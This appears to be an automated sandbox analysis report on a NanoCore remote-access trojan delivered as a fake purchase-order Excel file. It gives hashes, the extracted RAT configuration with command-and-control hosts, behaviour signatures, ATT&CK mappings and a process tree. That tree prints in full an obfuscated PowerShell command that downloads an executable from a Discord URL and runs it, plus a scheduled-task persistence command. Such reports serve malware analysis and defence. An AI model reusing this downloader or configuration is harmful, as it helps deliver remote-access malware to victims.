nanocore | e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b

General

Target

Purchase OrderDated19032021.xls
Size

81KB
MD5

1a49fe1a9c135ccd9c9f2d9cf395f378
SHA1

24d6ab599cef554a8e8e6b2e3abffb7072e6e1db
SHA256

e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b
SHA512

9659a2da6cebb7d4beec1142f0a04030ce0abf08cbf75899dc903115e8160d4277429f2a23d06dcc55c1477424e8333fe8990b7a42de3c06eae2561ae3a263b3

Score

10^/10

nanocore keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe

Extracted

Family

nanocore

Version

1.2.2.0

C2

185.140.53.130:2364

mydnsnanocore123.ddns.net:2364

Mutex

af625c00-d1f5-4435-80be-9f676efc59dc

Attributes

activate_away_mode
true
backup_connection_host
mydnsnanocore123.ddns.net
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2020-12-27T15:43:00.135192036Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
2364
default_group
17-03-2021NANO
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
af625c00-d1f5-4435-80be-9f676efc59dc
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
185.140.53.130
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4176	3712	Powershell.exe

Blocklisted process makes network request 1 IoCs

Processes:

Powershell.exe

flow pid process

17 4176 Powershell.exe
Executes dropped EXE 1 IoCs

Processes:

vjkEWrcAR.exe

pid process

1176 vjkEWrcAR.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

vjkEWrcAR.exe

description pid process target process

PID 1176 set thread context of 4404 1176 vjkEWrcAR.exe MSBuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
17	4176	Powershell.exe

pid	process
1176	vjkEWrcAR.exe

description	pid	process	target process
PID 1176 set thread context of 4404	1176	vjkEWrcAR.exe	MSBuild.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1788 schtasks.exe

pid	process
1788	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4640 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

Powershell.exeMSBuild.exe

pid	process
4176	Powershell.exe
4176	Powershell.exe
4176	Powershell.exe
4404	MSBuild.exe
4404	MSBuild.exe
4404	MSBuild.exe
4404	MSBuild.exe
4404	MSBuild.exe
4404	MSBuild.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

MSBuild.exe

pid process

4404 MSBuild.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

Powershell.exeMSBuild.exe

description pid process

Token: SeDebugPrivilege 4176 Powershell.exe
Token: SeDebugPrivilege 4404 MSBuild.exe

pid	process
4404	MSBuild.exe

description	pid	process
Token: SeDebugPrivilege	4176	Powershell.exe
Token: SeDebugPrivilege	4404	MSBuild.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE
4640	EXCEL.EXE

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

Powershell.exevjkEWrcAR.exe

description	pid	process	target process
PID 4176 wrote to memory of 1176	4176	Powershell.exe	vjkEWrcAR.exe
PID 4176 wrote to memory of 1176	4176	Powershell.exe	vjkEWrcAR.exe
PID 4176 wrote to memory of 1176	4176	Powershell.exe	vjkEWrcAR.exe
PID 1176 wrote to memory of 1788	1176	vjkEWrcAR.exe	schtasks.exe
PID 1176 wrote to memory of 1788	1176	vjkEWrcAR.exe	schtasks.exe
PID 1176 wrote to memory of 1788	1176	vjkEWrcAR.exe	schtasks.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe
PID 1176 wrote to memory of 4404	1176	vjkEWrcAR.exe	MSBuild.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe'',$env:temp+''\''+''vjkEWrcAR.exe'')'|bsbqkQGmN; start-process($env:temp+'\'+'vjkEWrcAR.exe')
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4176

C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1176

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF04.tmp"
3⤵
- Creates scheduled task(s)
PID:1788

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"{path}"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpF04.tmp
MD5
8b84f96ed1e97901159ee6f4097ecedd

SHA1
437dca92cf1cb274254baf67a84a59d06f63b09e

SHA256
2f88ae7aec53d77eb0ff6d5ece0b59431286cb1c2f68f50a71f32e71e898406e

SHA512
bdb9fce73eaf86bd684f138bd08083026358d39720ba2b591d1bb77b53e9259a3c4cb00c83c3eaba07ac00509d17e60f0ce9c8187f09477d60389b00e2cebe9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
MD5
894aea17779959eecac3bd54d66844a1

SHA1
29e6388dbf891443bbc5a1e503a539a2586e6868

SHA256
8a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9

SHA512
bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
MD5
894aea17779959eecac3bd54d66844a1

SHA1
29e6388dbf891443bbc5a1e503a539a2586e6868

SHA256
8a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9

SHA512
bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964

Download Submit
memory/1176-12-0x0000000000000000-mapping.dmp

Download
memory/1176-16-0x0000000000D80000-0x0000000000D81000-memory.dmp

Filesize
4KB

Download
memory/1788-17-0x0000000000000000-mapping.dmp

Download
memory/4176-9-0x000001DBFE740000-0x000001DBFE741000-memory.dmp

Filesize
4KB

Download
memory/4176-10-0x000001DBFE630000-0x000001DBFE632000-memory.dmp

Filesize
8KB

Download
memory/4176-11-0x000001DBFE633000-0x000001DBFE635000-memory.dmp

Filesize
8KB

Download
memory/4176-7-0x00007FF9BCE40000-0x00007FF9BD82C000-memory.dmp

Filesize
9.9MB

Download
memory/4176-8-0x000001DBFE0E0000-0x000001DBFE0E1000-memory.dmp

Filesize
4KB

Download
memory/4176-15-0x000001DBFE636000-0x000001DBFE638000-memory.dmp

Filesize
8KB

Download
memory/4404-20-0x000000000041E792-mapping.dmp

Download
memory/4404-22-0x00000000027A1000-0x00000000027A2000-memory.dmp

Filesize
4KB

Download
memory/4404-21-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/4404-19-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4640-5-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp

Filesize
64KB

Download
memory/4640-3-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp

Filesize
64KB

Download
memory/4640-2-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp

Filesize
64KB

Download
memory/4640-4-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmp

Filesize
64KB

Download
memory/4640-6-0x00007FF9C8FC0000-0x00007FF9C95F7000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads